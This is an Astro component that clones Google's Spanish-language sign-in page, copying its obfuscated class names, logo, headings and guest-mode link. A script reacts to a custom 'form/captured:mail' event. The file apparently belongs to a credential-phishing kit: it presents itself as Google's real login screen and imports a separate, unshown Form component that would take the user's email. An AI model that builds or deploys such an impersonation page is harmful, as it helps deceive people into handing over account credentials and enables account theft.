---
import GoogleSvg from "./Logo.astro";
import Footer from "./Footer.astro";
import Options from "./Options.astro";
import Progressbar from "./Progressbar.astro";
import Form from "./Form.astro";
---

<div class="S7xv8">
  <div class="TcuCfd NQ5OL">
    <Progressbar isActive={false} />

    <div class="fAlnEc" id="yDmH0d">
      <div id="ZCHFDb"></div>

      <div class="Svhjgc">
        <div class="zIgDIc">
          <div>
            <div class="Wf6lSd">
              <GoogleSvg />
            </div>
          </div>

          <div class="ObDc3 ZYOIke">
            <h1 class="vAV9bf" id="headingText">
              <span>Inicia sesión</span>
            </h1>
            <div class="gNJDp" id="headingSubtext">
              <span>Utiliza tu cuenta de Google</span>
            </div>
          </div>
        </div>

        <div id="form-container" class="UXFQgc hAfgic">
          <div class="qWK5J">
            <div class="xKcayf">
              <div class="AcKKx">
                <Form />
              </div>
              <div>
                <div class="RDsYTb">
                  <div class="dMNVAe">
                    ¿No es tu ordenador? Usa el modo Invitado para iniciar
                    sesión de forma privada. <a
                      href="https://support.google.com/chrome/answer/6130773?hl=es"
                      target="_blank"
                      >Más información sobre cómo usar el modo Invitado</a
                    >
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>

        <Options />
      </div>
    </div>

    <div id="background-loading" tabindex="0"></div>
  </div>

  <Footer />
</div>

<script>
  let formContainer = document.getElementById("form-container");
  let backgroundLoading = document.getElementById("background-loading");
  let progressbar = document.getElementById("progressbar");

  // Añadir esto en tu script
  document.addEventListener<any>("form/captured:mail", (event: CustomEvent) => {
    updateUIState(event.detail);
  });

  const updateUIState = (active: boolean) => {
    // Actualizar clases condicionales
    backgroundLoading?.classList.toggle("kPY6ve", active);
    progressbar?.classList.toggle("qdulke", !active);
    progressbar?.classList.toggle("jK7moc", !active);

    setInterval(() => {
      formContainer?.classList.toggle("GEcl0c", active);
    }, 300);
  };
</script>
